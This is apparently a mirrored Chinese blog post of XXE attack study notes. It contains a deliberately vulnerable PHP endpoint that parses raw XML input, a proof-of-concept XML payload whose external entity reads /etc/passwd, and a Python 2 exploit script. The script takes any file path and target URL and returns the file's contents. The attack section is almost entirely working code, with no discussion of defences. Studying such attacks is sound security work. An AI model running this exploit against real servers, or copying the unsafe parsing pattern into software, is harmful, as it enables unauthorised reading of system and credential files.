XXE攻击学习 - 走看看

zoukankan html css js c++ java

XXE攻击学习

环境：lAMP

simplexml_load_string.php代码内容

<?php

$data = file_get_contents('php://input');

$xml = simplexml_load_string($data);

echo $xml->name;

?>

POC:

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE xxe [

<!ELEMENT name ANY >

<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

<root>

<name>&xxe;</name>

</root>

EXP:

import urllib2

if __name__ == '__main__':

print u'输入要读取的文件，如file:///etc/passwd'

payload = raw_input()

print u'输入要访问的地址，如http://IP/simplexml_load_string.php'

url = raw_input()

#url = 'http://IP/simplexml_load_string.php'

headers = {'Content-type': 'text/xml'}

xml = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "' + payload + '" >]><root><name>&xxe;</name></root>'

req = urllib2.Request(url = url,headers = headers, data = xml)

res_data = urllib2.urlopen(req)

res = res_data.read()

print res

记得旧文章便是新举子

查看全文

相关阅读:
*HDU 1392 计算几何
 *HDU 1115 计算几何
 *HDU 1086 计算几何
 *HDU 2108 计算几何
 HDU 1528 贪心模拟/二分图
 HDU 1281 二分图
 *HDU1150 二分图
 *HDU1151 二分图
 *HDU 1068 二分图
 *HDU 1054 二分图

原文地址：https://www.cnblogs.com/NBeveryday/p/8124539.html

Copyright © 2011-2022 走看看